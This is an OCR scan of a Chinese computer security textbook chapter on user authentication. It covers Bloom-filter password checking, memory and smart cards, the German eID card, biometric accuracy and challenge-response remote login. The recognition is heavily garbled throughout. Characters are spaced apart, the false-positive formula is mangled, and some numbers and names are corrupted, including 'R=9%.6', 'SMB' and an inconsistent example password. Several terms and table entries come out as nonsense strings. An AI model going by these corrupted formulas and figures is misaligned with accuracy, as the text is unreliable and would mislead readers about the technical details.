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如 果 对 于 某 个 (i, /), Ai(X)=67, MAB PHS 67 位 上 的 数值 将 被 设置 为 1 ; 如 果 该 位 已 
经 为 1， 那么 仍然 保持 该 位 为 1 不 变 。 
当 口 令 检 测 器 收 到 一 个 新 的 口令 时 ， 检 测 器 将 计算 该 口令 的 大 个 散 列 值 。 如 果 散 列表 中 所 有 
的 对 应 位 的 值 都 是 1， 那 么 这 个 口令 将 会 被 弃 用 。 易 猜测 口令 字典 中 出 现 的 所 有 口令 都 将 被 拒绝 使 
用 。 但 是 ， 某 些 没 有 在 易 猜 测 口令 字典 中 出 现 的 口令 也 可 能 在 散 列表 中 产生 匹配 ， 这 种 情况 被 称 
为 “ 误 判 ” 。 为 了 便于 理解 这 个 问题 ， 可 以 考虑 使 用 两 个 散 列 函数 的 方案 。 假 设 口令 undertaker 
和 hulkhogan 在 口令 字典 中 ， 口 令 xG%Hij98 不 在 字典 中 。 进 一 步 假设 有 如 下 计算 结果 : 
Hi(undertaker)=25 Hi(hulkhogan)= 83 H,(xG%#jj98) = 25 
H,(undertaker) = 998 H,(hulkhogan) = 665 H,(xG%#j98)=998 
如 果 将 口令 GAHI 提交 给 系统 ， 那 么 即使 这 个 口令 并 没有 在 易 猜 测 口令 字典 中 出 现 ， 
也 将 会 被 弃 用 。 如 果 存 在 很 多 类 似 的 误 判 情况 ， 那 么 用户 在 选择 口令 时 就 会 很 困难 。 因 此 ， 应 
该 设计 一 种 使 “ 误 判 ”的 情况 最 少 的 散 列 方案 。“ 误 判 ” 的 概率 可 以 使 用 以 下 公式 近似 表示 : 
P=:(1 =e "= 一 eeR) 


或 者 ， 等 价 地 表示 为 


pep 
eS np") 
其 中 
© 大 表示 散 列 函数 的 数量 ; 
© N 表 示 散 列表 的 位 数 ; 
© DD 表示 口令 字典 的 口令 数量 ; 
© 及 表示 ND， 是 散 列表 规模 (位 ) 和 字典 规模 ( 词 ) 的 比值 。 
图 3-4 绘制 了 对 于 不 同 k 值 的 R 的 旺 数 P。 假设 口令 字典 中 有 一 百 万 个 口令 ， 并且 我 们 希 
望 以 0.01 的 误 判 率 来 拒绝 用 户 选择 的 不 包含 在 口令 字典 中 的 口令 。 从 图 中 可 以 看 到 ， 如 果 选 
择 6 个 散 列 函数 ， 需 要 的 比值 是 R=9%.6。 因 此 ， 需 要 一 个 9.6X105 位 的 散 列 表 或 者 说 需要 
1.2MB 的 散 列 表 存 储 空 间 。 相 反 ， 存 储 整 个 口令 字典 要 求 有 SMB 的 存储 空间 。 相 比 之 下 ， 采 用 
这 种 方法 在 存储 空间 上 压缩 了 近 1/7。 此 外 ， 该 方法 中 口令 的 检查 只 需要 计算 6 个 散 列 函数 ， 这 
[89] 与 字典 的 大 小 无 关 。 然 而 ， 如 果 使 用 全 部 的 口令 字典 会 使 搜索 的 工作 量变 得 很 大 。9S 
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© Bloom 过 滤器 应 用 了 概率 统计 技术 ， 不 在 口令 字典 中 的 口令 被 拒绝 的 概率 是 很 小 的 。 因 此 ， 经 常 出 现 这 些 
情况 ， 在 采用 概率 技术 进行 算法 设计 时 ， 求 解 时 间 较 少 或 者 求解 过 程 比较 简单 ， 或 者 两 种 情况 兼 有 。 
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3.3 ”基于 令 牌 的 认证 
令 牌 就 是 用 户 持 有 的 用 于 进行 用 户 认证 的 一 种 物品 。 本 节 中 ， 我 们 将 介绍 两 种 应 用 最 广泛 
的 令 牌 它们 有 和 银行 卡 相似 的 大 小 和 外 形 ( 见 表 3-2 )。 
表 3-2 用 作 令 牌 的 卡 的 类 型 
| ee 


卡 的 正面 有 凸 印 的 字符 
卡 的 背面 有 磁 条 ， 正 面 有 字符 
























卡 的 内 部 有 电子 存储 单元 预付 电话 卡 
智能 卡 卡 内 有 电子 存储 单元 和 处 理 器 
表面 有 电子 触 点 生物 特征 ID 卡 





内 部 嵌 有 无 线 电 通信 装置 


3.3.1 存储 卡 


存储 卡 只 能 存 取 数据 而 不 能 处 理 数据 。 这 类 卡 最 常见 的 就 是 银行 卡 ， 在 卡 的 背面 有 磁 条 。 
这 个 磁 条 可 以 存储 一 些 简单 的 安全 码 ， 磁卡 可 以 通过 一 种 价格 并 不 昂贵 的 读 卡 器 读 取 。 此 类 存 
储 卡 的 内 部 含有 一 个 电子 存储 器 。 
存储 卡 可 以 单独 用 于 物理 访问 ， 例 如 旅馆 房间 的 门禁 系统 。 对 于 计算 机 用 户 认 证 ， 这 种 卡 
通常 需要 用 户 输入 某 种 形式 的 口令 或 者 个 人 标识 码 ( PIN)。 存 储 卡 的 一 种 典型 应 用 就 是 自动 柜 
员 机 ( ATM)。 由 于 必须 同时 拥有 存储 卡 和 PIN， 组 合 使 用 口令 和 PIN 的 存储 卡 提供 的 安全 性 
远 高 于 单独 使 用 口令 的 安全 性 。 敌 手 必须 实际 持 有 该 卡 ( 或 者 能 复制 它 )， 还 必须 获得 有 关 PIN 
的 知识 。 存 储 卡 可 能 存在 的 缺陷 如 下 [NIST95]: 
© 需要 特殊 的 读 卡 器 : 读 卡 器 需要 软件 和 硬件 来 支持 安全 性 ， 这 提高 了 令 牌 认证 方法 的 
成 本 。 
© 令 牌 丢失 : 令 牌 的 丢失 会 使 得 用 户 暂时 不 能 进入 系统 。 补 办 丢失 的 令 牌 ， 会 增加 管理 
的 成 本 。 此 外 ， 如 果 令 牌 被 偷窃 或 者 被 伪造 ， 那 么 敌手 只 需要 获取 PIN 就 可 以 执行 非 
授权 的 访问 。 
e 用 户 不 满意 : 虽然 用 户 对 于 ATM 存储 卡 的 使 用 没有 意见 ， 但 是 把 存储 卡 应 用 在 计算 机 
系统 中 ， 肯 定 是 不 方便 的 。 


3.3.2 智能卡 


很 多 设备 都 可 以 被 称 为 智能 令 牌 ， 可 以 从 四 个 方面 对 它们 进行 分 类 ， 而 这 些 分 类 并 不 是 互 斥 的 : 
© 物理 特征 : 智能 令 牌 包括 一 个 嵌入 的 微 处 理 器 。 其 外 表 类 似 于 银行 卡 ， 因 此 称 其 为 智 
能 卡 。 其 他 的 一 些 智 能 令 牌 的 外 表 有 的 类 似 于 计算 器 ， 有 的 类 似 于 钥匙 或 其 他 便携 式 
物品 。 
。 AARO: 人 机 接口 包括 一 个 键盘 区 和 显示 设备 ， 以 完成 人 机 交互 。 
。 电子 接口 : 智能 卡 或 其 他 令 牌 通常 需要 配 一 个 电子 接口 ， 用 于 与 读 取 或 写 人 装置 通信 。 
一 张 卡 可 能 含有 下 述 两 种 或 其 中 一 种 接口 : 
m 接触 式 〈 contact) : 使 用 接触 式 智能 卡 时 ， 智 能 卡 必须 被 插入 智能 卡 读 取 器 中 ， 通 过 
卡 表面 的 导电 接触 板 (通常 是 金属 板 ) 与 读 取 器 直接 接触 。 指 令 、 数 据 和 状态 信息 
的 传输 发 生 在 这 些 物 理 接触 点 上 。 
m 非 接触 式 ( contactless) : 使 用 非 接触 式 智能 卡 时 ， 智 能 卡 只 需要 接近 读 取 器 。 智 能 
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卡 和 读 取 器 均 载 有 天 线装 置 ， 两 者 通过 无 线 频率 进行 交互 。 另 外 ， 大 多 数 非 接触 式 
智能 卡通 过 该 电磁 信号 为 其 内 置 芯 片 提供 电能 。 对 于 非 电池 供电 卡 ， 其 接近 距离 一 
般 为 1.5 ~ 3 英寸 (1 英寸 =0.0254 米 )， 且 这 类 卡通 常 被 应 用 于 建筑 物 门禁 或 者 快 


捷 支 付 等 方面 。 


e 认证 协议 : 使 用 智能 令 牌 的 目的 就 是 提供 用 户 认证 方法 。 我 们 可 以 按照 认证 协议 把 智 


能 令 牌 划分 为 三 类 : 


m 静态 协议 (static): 使 用 静态 协议 时 ， 用 户 首先 完成 自己 对 令 牌 的 认证 ， 之 后 令 牌 完 
成 计算 机 对 用 户 的 认证 。 静 态 协议 的 后 半 部 分 类 似 于 存储 令 牌 的 操作 。 

日 动态 口令 生成 器 (dynamic password generator): 在 这 种 情况 下 ， 每 隔 一 段 时 间 (比如 
每 分 钟 ) 令 牌 就 会 产生 一 个 口令 ， 之 后 这 个 口令 就 会 被 计算 机 和 令 牌 用 于 认证 ， 可 
以 是 用 户 手 工 进行 ， 也 可 以 通过 令 牌 自动 进行 。 计 算 机 和 令 牌 必须 被 初始 化 并 保持 


同步 ， 从 而 使 得 计算 机 知道 当前 令 牌 使 用 的 口令 。 


m 挑战 - 应 答 协议 (challenge-response) : 在 这 种 情况 下 ， 计 算 机 系统 产生 一 个 质询 信 
号 ， 比 如 一 个 随机 的 数字 串 。 智 能 令 牌 将 会 产生 一 个 基于 这 个 挑战 信号 的 应 答 信 和 号 。 
例如 ， 在 公 钥 加 密 机 制 中 ， 令 牌 可 以 使 用 私 钥 对 挑战 串 进行 加 密 。 
在 计算 机 的 用 户 认 证 方面 ， 最 重要 的 智能 令 牌 种 类 就 是 智能 卡 ， 它 的 外 形 和 信用 卡 一 样 ， 
拥有 电子 接口 ， 并 且 可 以 使 用 刚才 所 描述 的 任何 类 型 的 协议 。 接 下 来 ,我们 继续 讨论 智能 卡 。 
智能 卡 包 含 一 个 完整 的 微 处 理 器 ， 由 处 理 器 、 内 存 、 输 入 /输出 端口 组 成 。 某 些 版 本 的 智 
能 卡 集成 有 进行 密码 运算 的 协 处 理 电 路 ， 以 加 速 对 消息 进行 编码 和 解码 或 者 产生 数字 签名 来 验 
证 传输 数据 有 效 性 的 工作 。 在 某 些 卡 中 ， 对 IO 端口 的 访问 是 可 兼容 读 卡 器 通过 暴露 式 电子 接 
触 的 方法 来 直接 完成 的 ， 另外 一 些 卡 则 使 用 嵌入 的 天 线 完成 与 读 卡 器 的 无 线 通 信 。 
一 个 典型 的 智能 卡 包括 三 种 存储 器 。 只 读 存 储 器 (ROM) 存储 的 数据 在 整个 智能 卡 的 生命 周期 
内 都 不 会 发 生变 化 ， 例 如 存储 卡 的 序列 号 以 及 持 卡 人 的 姓名 。 电 子 可 擦 写 可 编程 存储 器 (EEPROM) 


存储 应 用 程序 和 数据 ， 例 如 智能 卡 所 执行 的 协议 。 这 种 
存储 器 也 存储 可 能 会 随时 改变 的 数据 ， 例 如 在 电话 卡 
H, EEPROM 存储 剩余 的 通话 时 间 。 随 机 存 取 存 储 器 
(RAM) 则 保存 应 用 程序 执行 时 产生 的 临时 数据 。 

图 3-5 显示 了 智能 卡 与 读 卡 器 或 计算 机 系统 的 典型 
交互 模式 。 每 次 智能 卡 在 插 人 到 读 卡 器 时 ， 读 卡 器 都 会 
产生 一 个 复位 (reset) 信号 以 对 参数 进行 初始 化 ， 例 如 时 
钟 的 值 。 在 完成 复位 功能 后 ， 智 能 卡 将 会 有 一 个 应 答 来 
响应 复位 (ATR) 消息 。 这 个 响应 消息 定义 了 智能 卡 能 使 
用 的 参数 和 协议 及 其 所 执行 的 功能 。 计 算 机 终端 可 以 通 
过 协议 类 型 选择 ( PTS) 命令 来 改变 使 用 的 协议 和 其 他 
的 参数 。 智 能 卡 根据 PTS 响应 信和 号 来 确认 使 用 的 协议 
和 参数 。 至 此 ， 终 端 和 智能 卡 就 可 以 执行 应 用 程序 了 。 


3.3.3 ”电子 身份 证 


在 智能 卡 的 诸多 应 用 中 ， 有 一 项 应 用 正 变 得 越 来 
越 重要 ， 即 公民 身份 证 智能 卡 化 。 在 涉 人 政府 机 构 或 商 
业 服 务 时 ， 国 家 电子 身份 证 ( Electronic Identify, eID) 
不 仅 可 以 作为 国家 身份 证 ， 还 可 以 行使 其 他 多 种 证 件 





PTS 交 涉 协 议 


PTS 交 涉 应 答 
命令 APDU 


C 响应 APDU 
ARER. 


APDU= 应 用 协议 数据 单元 
ATR 一 对 复位 信号 的 应 答 
PTS 一 协议 类 型 选择 


3-5 智能 卡 与 读 卡 器 的 交互 
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的 功能 ， 例 如 驾驶 证 。 另 外 ， 电 子 身 份 证 在 各 种 应 用 中 可 以 更 有 效 地 证 明 持 有 人 的 身份 。 事 实 
上 ， 一 张 电子 身份 证 就 是 一 张 被 国家 政府 验证 的 可 信和 有 效 的 智能 卡 。 

最 新 、 最 前 沿 的 电子 身份 证 大 规模 应 用 是 德国 电子 身份 证 一 一 新 身份 证 (neuer 
Personalausweis) [POLL12]。 该 卡 的 表面 印 有 人 可 以 阅读 的 信息 ， 其 中 包括 : 
个 人 信息 : 例如 姓名 、 出 生日 期 及 住址 ; 此 类 信息 一 般 在 护照 或 驾驶 执照 等 证 件 上 也 
可 找到 。 
文档 编号 : 每 一 张 智 能 卡 均 配 有 的 由 9 位 字母 或 数字 构成 的 唯一 识别 符 。 
卡片 接 入 号 (Card Access Number, CAN): 印刷 于 智能 卡 表 面 的 6 位 随机 的 十 进 制 数字 。 
这 些 数字 被 当 作 口令 使 用 ， 下 文中 会 解释 它 。 
机 器 读 卡 区 ( Machine Readable Zone, MRZ): 智能 卡 背 面 的 三 行文 字 ， 人 类 和 机 器 均 
可 阅读 。 这 些 文本 同样 也 可 作为 口令 使 用 。 

电子 身份 证 的 功能 ”电子 身份 证 具有 以 下 三 种 独立 的 功能 ， 每 种 功能 都 具有 自己 的 受 保护 

数据 集 (BWR 3-3 ): 

e ePass 功能 : 该 功能 存储 表示 持 有 者 身份 的 数字 信息 ， 专 为 政府 部 门 保 留 使 用 。 该 功 
能 使 得 电子 身份 证 类 似 于 一 个 电子 护照 。 其 他 政府 职能 服务 也 会 用 到 ePass 功能 。 该 
功能 必须 在 智能 卡 上 实现 。 

e eiD 功能 : 该 功能 在 政府 和 商业 的 各 种 应 用 中 通用 。 电 子 身 份 功能 存储 持 有 人 的 身份 
记录 ， 以 便 授权 的 服务 在 持 有 者 允许 的 情况 下 使 用 。 公 民 可 根据 意愿 选择 是 否 激 活该 
功能 。 

e eSign HRE: 该 功能 是 可 选 的 ， 其 作用 是 存储 私 钥 和 用 于 验证 私 钥 的 证 书 ; 它 用 于 生 
成 持 有 人 的 数字 签名 。 证 书 由 一 个 私有 可 信 中 心 发 布 。 


表 3-3 电子 身份 证 的 功能 和 数据 


姓名 、 艺 名 和 博士 | FMEN, ERR 


有 效 期 消除 疑问 
认证 在 线 安装 签名 证 书 | DPN | 












ePass (强制 ) 






eID〈 可 选 激活 ) 













生成 数字 签名 
CAN 一 卡片 接 入 号 
MRZ 王 机 器 读 卡 区 
PACE 二 口令 认证 连接 设施 
PIN 三 个 人 标识 码 


ePass 功能 是 离线 功能 。 也 就 是 说 ， 该 功能 仅 在 持 卡 人 出 示 智 能 卡 的 当地 使 用 ， 而 不 是 通 
过 网 络 使 用 ， 例 如 通过 某 地 的 护照 检查 。 

eID 功能 可 被 用 于 在 线 和 离线 服务 。 一 个 典型 的 例子 就 是 离线 检测 系统 ， 它 是 用 于 执法 检 
测 的 终端 ， 此 系统 通常 由 警察 局 或 人 境 管 理 部 门 使 用 。 离 线 检 测 系统 可 以 读 取 持 卡 人 的 身份 信 
息 和 智能 卡 中 的 生物 特征 信息 ， 例 如 面部 特征 和 指纹 。 生 物 特 征 信 息 可 被 用 于 验证 当前 使 用 智 


[92] 
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能 卡 的 人 是 否 就 是 真正 的 持 卡 人 。 

用 户 认 证 是 一 个 很 好 的 eID 在 线 应 用 的 例子 。 图 3-6 描述 了 一 个 基于 Web 的 场景 。 开 始 
A, eID 用 户 访问 一 个 网 站 ， 并 请 求 一 项 需 认证 的 服务 。 网 站 返回 一 个 重 定向 消息 ,该 消息 转 
发 至 eID RI. ID 服务 器 请 求 用 户 输入 其 电子 身份 证 的 PIN。 一 旦 用 户 输入 了 正确 的 PIN, 
电子 身份 证 便 可 与 终端 读 取 器 以 密 文 形式 进行 数据 交换 。 随 后 ， 服 务 器 与 电子 身份 证 上 的 微 处 
理 器 进行 认证 协议 交换 。 如 果 用 户 确实 是 认证 用 户 ， 那 么 服务 器 将 认证 结果 返回 给 用 户 系 统 ， 
并 重 定向 至 Web 服务 器 应 用 。 





1. 用 户 请 求 服务 
(例如 ， 通 过 网 
页 浏览 器 ) 





图 3-6 利用 eID 的 用 户 认 证 


在 上 述 的 场景 中 ， 用 户 系 统 中 需要 具备 相应 的 软 硬 件 。 用 户 系统 上 的 软件 具有 请 求 和 接收 
PIN 码 以 及 消息 重 定向 的 功能 。 而 且 硬 件 需 要 电子 身份 证 读 取 器 ， 该 读 取 器 可 以 是 非 接 触 式 或 
接触 式 的 外 置 读 取 器 ， 也 可 以 是 非 接触 式 的 内 置 读 取 器 。 

口令 认证 连接 设施 (PACE) 口令 认证 连接 设施 (Password Authenticated Connection 
Establishment, PACE) 能 够 确保 非 接触 式 的 RF 芯片 和 电子 身份 证 信息 在 没有 明确 访问 控制 的 
情况 下 不 能 被 读 取 。 对 于 在 线 应 用 而 言 ， 只 有 用 户 输入 了 仅 持 卡 人 知道 的 6 位 PIN 后 ， 他 才 
有 权 使 用 该 卡 。 对 于 离线 应 用 而 言 ， 智 能 卡 背 面 印 有 的 MRZ 和 正面 的 卡片 接 人 号 (CAN) 均 
可 被 用 于 认证 。 


3.4 生物 特征 认证 


生物 特征 认证 系统 是 通过 个 人 唯一 拥有 的 身体 特征 来 实现 认证 的 。 这 些 特 征 既 包括 静态 特 
征 如 指纹 、 手 形 、 面 部 特征 、 视 网 膜 和 虹膜 等 ， 也 包括 动态 特征 如 声 纹 和 签名 等 。 本 质 上 ， 生 
物 特征 认证 是 基于 模式 识别 的 。 与 口令 和 令 牌 的 方法 相 比 ， 生 物 特征 认证 实现 技术 较为 复杂 ， 
成 本 也 较 高 。 然 而 在 很 多 特殊 情况 下 ， 生 物 特 征 认证 方法 被 广泛 使 用 。 目 前 生物 特征 认证 技术 
已 经 趋 于 成 熟 ， 可 以 作为 计算 机 系统 进行 用 户 认 证 的 标准 工具 。 


3.4.1 用 于 生物 特征 认证 应 用 的 身体 特征 
很 多 不 同类 型 的 身体 特征 ， 在 用 户 认证 中 已 经 在 应 用 或 者 正在 研究 之 中 。 常 见 的 包括 以 下 
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© 面部 特征 (facial characteristic): 面部 特征 是 人 对 人 (human-to-human) 识别 中 最 常用 的 
方法 ， 因 此 ， 很 自然 地 被 纳入 到 使 用 计算 机 进行 认证 的 方法 中 。 最 常用 的 方法 是 基于 
ATURE URE. BE. AT. BATS) 的 形状 来 细 化 面部 特 
征 。 另 外 一 种 方法 ， 是 使 用 红外 线 照 相机 拍摄 一 张 与 人 脸 内 部 隐 含 的 血管 系统 相关 的 
面部 温 谱 图 (thermogram ) 。 

o 指纹 (fingerprint) : 指纹 作为 身份 识别 的 方法 已 经 有 上 百年 的 历史 ， 并 且 出 于 执法 的 目 
的 ， 指 纹 识别 的 过 程 已 经 被 系统 化 和 自动 化 了 。 指 纹 ， 就 是 指 尖 表面 的 纹路 裙 皱 的 模 
式 。 每 个 人 的 指纹 在 全 人 类 中 被 认为 是 唯一 的 。 在 应 用 中 ， 指 纹 识别 和 匹配 系统 会 自 
动 地 对 指纹 中 的 特征 进行 提取 ， 并 对 指纹 的 全 部 模式 进行 数字 化 存储 。 

o FÆ (hand geometry): 手 形 系 统 标识 手掌 的 特征 ， 包 括 形状 、 手 指 的 长 度 和 宽度 等 。 

o 视网膜 模式 (retinal pattern) : 由 视网膜 表面 下 的 静脉 形成 的 特征 具有 唯一 性 ， 因 此 适 
合 于 认证 。 视 网 膜 生 物 特征 认证 系统 ， 通 过 发 射 低 强度 的 可 见 光 或 者 红外 射线 扫描 眼 
睛 得 到 视网膜 模式 的 数字 图 像 特征 。 

o 虹膜 (iris): 另 一 种 唯一 的 身体 特征 是 具有 复杂 结构 的 虹膜 。 

e #2 (signature): 每 一 个 人 都 有 自己 特有 的 笔迹 ， 这 种 特征 在 签名 上 表现 得 很 明 
显 。 签 名 通常 是 频繁 书写 的 序列 。 尽 管 如 此 ， 同 一 个 人 的 多 次 签名 样本 很 可 能 是 
不 同 的 。 Eb 

e 语音 (voice) : 虽然 一 个 人 的 签名 风格 不 仅 反 映 了 其 唯一 的 物理 属性 ， 也 反映 了 其 形成 
Se 
由 于 同一 个 说 话 者 的 语音 样本 随 着 时 间 的 推移 有 所 变化 ， 这 使 得 语音 识别 工作 变 得 复 
杂 起 来 。 RUT RT 

图 3-7 大 致 地 给 出 了 这 些 生物 特征 测量 方法 的 相对 代价 | ae 

和 准确 度 。 准 确 度 的 概念 并 不 适合 于 利用 智能 卡 和 口令 的 用 | 4 
户 认证 方案 。 例 如 ， 当 用 户 输入 口令 时 ， 该 口令 必须 完全 匹 Ll ge 
配 预 期 口令 才能 完成 用 户 身 份 的 确认 。 在 使 用 生物 特征 认证 Ka 
时 ， 系 统 必 须 确 定 提 供 的 生物 特征 和 系统 存储 的 特征 接近 到 =e cai 
什么 程度 才 认为 是 匹配 的 。 在 详细 阐述 生物 特征 准确 度 之 准确 度 
前 ,我 们 必须 了 解 生 物 特征 认证 系统 是 如 何 工作 的 。 图 3-7 使 用 不 同 生 物 特 征 认 证 的 


成 本 与 准确 度 的 对 比 
3.4.2 ”生物 特征 认证 系统 的 运行 


图 3-8 显示 了 一 个 生物 特征 认证 系统 的 运行 过 程 。 每 一 个 被 包含 在 授权 用 户 数据 库 中 的 认 
证 个 人 ， 首 先 必须 在 系统 中 注册 (enrolled) 。 这 类 似 于 给 用 户 分 配 口令 。 对 于 一 个 生物 特征 认 
证 系统 ， 用 户 需要 给 系统 提供 一 个 用 户 名 以 及 某 种 类 型 的 口令 或 PIN， 同时 认证 系统 的 传感器 
需要 采集 用 户 的 生物 特征 (如 右手 食指 指纹 )。 系 统 将 输入 的 生物 特征 数字 化 并 提取 出 特征 集 
合 ， 并 将 这 些 代表 唯一 生物 特征 的 数据 或 数据 集合 保存 起 来 。 这 些 数据 集合 被 称 为 该 用 户 的 模 
板 (template)。 现 在 用 户 已 经 完成 了 在 系统 中 的 注册 ， 系 统 维护 着 用 户 名 (ID)， 可 能 还 有 用 户 
的 PIN 或 者 口令 ， 以 及 生物 特征 值 。 

根据 不 同 的 应 用 ， 生 物 特征 认证 系统 的 用 户 认 证 包括 验证 (verification) 或 识别 
( identification) 。 验 证 类 似 于 用 户 使 用 存储 卡 或 智能 卡 并 结合 口令 或 PIN 登录 到 系统 。 对 于 
生物 特征 验证 ， 用 户 需要 输入 一 个 PIN， 并 使 用 传感器 采集 生物 特征 信息 。 系 统 提取 相应 特 





70 # ED HAMEZARKISAE 


征 ， 并 将 其 与 为 该 用 户 保存 的 模板 进行 比较 。 如 果 匹 配 ， 则 完成 对 这 个 用 户 的 身份 认证 。 
对 于 识别 系统 ， 个 人 只 需要 使 用 生物 传感器 而 不 需要 提供 其 他 额外 的 信息 。 系 统 将 当前 提 
供 的 模板 与 预先 存储 的 模板 进行 比较 。 如 果 匹 配 ， 则 用 户 被 识别 。 和 否则， 用 户 被 拒绝 。 








“未 识别 用 户 ” 


c) 识别 


图 3-8 一 个 通用 的 生物 特征 认证 系统 。 注 册 过 程 将 会 在 系统 中 为 用 户 和 用 户 的 生 
物 特征 创建 一 个 关联 。 根 据 应 用 的 不 同 ， 用 户 认证 包括 验证 声称 的 用 户 是 
否 是 真实 的 用 户 ,或 者 识别 系统 未 知 的 用 户 


3.4.3 ”生物 特征 认证 的 准确 度 概率 密 


在 生物 特征 认证 方案 中 ， 每 一 个 个 体 FA 
的 某 种 身体 特征 会 被 映射 成 数字 表示 。 对 
于 每 一 个 个 体 ， 都 有 一 个 数字 表示 或 模板 
存储 在 计算 机 中 。 当 有 用 户 要 被 认证 时 ， 
系统 将 会 对 存储 的 用 户 模板 和 目前 获取 到 
的 用 户 模板 进行 对 比 。 由 于 身体 特征 的 复 
杂 性 ， 我 们 不 能 期 望 这 两 个 模板 是 完全 匹 
配 的 。 相 应 地 ， 系 统 通过 _ 种 算法 来 产生 






7% sit 


输入 的 用 户 模板 与 预先 存储 的 用 户 模板 之 A 
间 的 匹配 分 数 (通常 是 一 个 数 )， 用 于 量化 冒名 项 替 者 ”真正 用 户 的 。 匹配 分 数 
两 者 的 相似 程度 。 的 平均 匹配 值 平均 匹配 什 (s) 
3-9 说 明了 系统 面 对 的 困难 选择 。 图 3-9 授权 用 户 和 冒名 顶替 者 的 生物 特征 曲线 。 在 本 
如 果 在 系统 中 对 被 指定 的 某 一 个 用 户 进 行 描述 中 ， 将 提交 的 特征 和 参考 特征 之 间 的 差异 
多 次 测试 ， 匹 配 分 数 s 将 会 有 变化 ， 它 的 简化 为 一 个 数值 。 如 果 输 入 值 (s) 大 于 预先 指 


概率 密度 函数 形 如 图 中 所 示 的 钟 形 曲线 。 定 的 国 值 (D)， 那 么 就 认为 是 匹配 的 


BIE APL GE 71 


例如 ， 在 指纹 认证 中 ， 结 果 可 能 由 于 传感器 噪声 的 影响 而 变化 ， 手 指 肿胀 或 者 干燥 等 也 可 
能 影响 到 结果 ， 手 指 的 放置 位 置 等 因素 也 会 对 匹配 结果 有 所 影响 。 平 均 而 言 ， 其 他 人 的 
匹配 分 数 应 该 低 得 多 ， 但 也 会 呈现 出 钟 形 的 概率 密度 函数 。 困 难 在 于 真正 的 用 户 和 冒 
名 顶替 者 的 候 配 分 数 的 范围 与 给 定 的 参考 模板 相 比 ， 很 可 能 是 重 登 的。 在 图 3-9 PK 
置 了 一 个 阔 值 :， 当 分 数 s 宇 t 时 ， 就 认为 匹配 ; 当 得 分 s<t 时 ， 就 认为 不 匹配 。 阅 值 
1 右边 的 阴影 部 分 表示 可 能 发 生 误 匹配 的 区 域 ， 左边 的 阴影 部 分 表示 可 能 发 生 漏 匹 配 
的 区 域 。 每 个 阴影 区 域 的 面积 分 别 表 示 误 匹配 和 漏 匹 配 的 概率 。 通 过 阔 值 上 的 左 移 和 
右 移 可 以 调整 这 两 个 概率 。 但 要 注意 ， 误 匹配 率 下 降 必 然 导 致 漏 匹 配 率 的 上 升 ， 反 之 
亦 然 。 

对 于 一 个 给 定 的 生物 特征 认证 方案 ， 可 以 绘制 误 匹 配 率 - 漏 匹配 率 曲线 ， 我 们 称 之 为 运 
行 特征 曲线 ( operating characteristic curve) 。 图 3-10 就 是 两 个 不 同系 统 的 运行 特征 曲线 。 左 
侧 偏 下 曲线 的 表现 明显 更 好 。 曲 线 上 的 圆 点 对 应 测量 中 的 一 个 特殊 阅 值 。 阅 值 向 左上 方 变换 
可 增强 系统 的 安全 性 ， 相 应 的 代价 是 降低 了 便利 性 。 其 中 ， 造 成 不 便 的 原因 是 合法 用 户 可 能 
被 拒绝 访问 并 需 进 一 步 认 证 。 合 理 的 权衡 是 选择 的 阅 值 应 该 对 应 于 曲线 上 两 个 比率 值 相 等 的 
点 。 一 个 要 求 高 安全 性 的 应 用 可 能 要 求 误 匹配 率 非常 低 ， 应 选择 偏向 于 曲线 左 侧 的 点 。 对 于 
取证 应 用 ， 系 统 则 应 降低 漏 匹 配 率 ， 尽 可 能 地 不 漏 掉 嫌 疑 人 。 

3-11 给 出 了 对 实际 产品 测试 产生 的 特征 曲线 。 虹 膜 特 征 认证 系统 在 超过 200 万 个 交 
叉 比 较 中 没有 出 现 一 次 误 匹 配 。 对 误 匹 配 率 整体 考虑 ， 可 以 看 出 面部 特征 认证 方法 的 效果 
最 差 。 
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图 3-10 ”理想 化 的 生物 特征 测量 运行 特征 曲线 (对 数 - 对 数 比例 ) 
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图 3-11 [MANSO1] 报道 的 真实 生物 特征 测量 运行 特征 曲线 。 为 了 更 清楚 地 表示 出 各 个 系统 
的 差异 ， 图 中 采用 了 对 数 - 对 数 刻度 


3.5 ”远程 用 户 认证 


最 简单 的 用 户 认证 方式 就 是 本 地 认证 ， 即 用 户 试图 访问 本 地 的 系统 ， 如 单机 的 办 公 PC 或 
者 ATM 机 。 复 杂 一 些 的 情况 则 是 通过 Internet、 网 络 、 通 信 线 路 的 远程 用 户 认证 。 远 程 用 户 认 
证 的 方式 增加 了 很 多 安全 威胁 ， 例 如 口令 窃听 或 者 对 观察 到 的 用 户 认证 过 程 进 行 重 放 等 。 

为 了 应 对 对 远程 用 户 认 证 的 攻击 ， 系 统 逐 渐 依赖 于 某 种 形式 的 质询 - 响应 协议 。 本 节 我 们 
将 针对 本 章 讨论 的 各 种 认证 方法 解释 一 下 这 些 协议 的 基本 要 素 。 


3.5.1 口令 协议 


图 3-12a 提供 了 一 个 通过 口令 认证 的 质询 - 响应 协议 的 简单 例子 。 实 际 使 用 的 协议 (如 
第 23 章 讨论 的 Kerberos) 更 加 复杂 。 在 这 个 例子 中 ， 用 户 首先 把 他 的 身份 发 送 给 远程 主机 ， 
远程 主机 将 产生 一 个 随机 数 >， 通 常 称 为 nonce 值 ， 并 将 这 个 nonce 值 返回 给 用 户 。 此 外 ， 远 
程 主 机 需要 指定 两 个 函数 h0 ALSO 在 响应 过 程 中 使 用 。 从 远程 主机 到 用 户 的 数据 传输 称 为 质 
HJ (challenge)。 用 户 的 响应 是 函数 f(r'"，h(P”))=r 的 值 ， 其 中 “一 "并 且 PP’ RAPA. K 
BA) 是 一 个 散 列 函数 ， 所 以 响应 中 包含 了 通过 0 函数 组 合 起 来 的 随机 数 和 用 户口 令 的 散 列 
函数 值 。 | 

远程 主机 存储 了 每 一 个 注册 用 户 的 口令 的 散 列 值 ， 对 于 用 户 上 使 用 APU) 来 表示 。 当 收 
到 应 答 时 ， 远 程 主 机 计算 出 函数 .Ar, APO 的 值 并 与 收 到 的 f(r, APY 值 进行 对 比 。 如 果 数 
值 相等 ， 那 么 该 用 户 就 被 认证 。 

这 种 策略 可 以 抵御 几 种 形式 的 攻击 。 远 程 主机 存储 的 并 不 是 口令 ， 而 是 口令 的 散 列 值 。 正 
如 在 3.2 节 中 讨论 过 的 ， 对 于 入 侵 到 主机 的 攻击 者 ， 这 种 口令 存储 方式 是 比较 安全 的 。 此 外 ， 
散 列 口令 并 不 是 直接 进行 传输 的 ， 而 是 传输 一 个 以 散 列 口令 作为 参数 的 函数 。 因 此 ， 对 于 一 个 
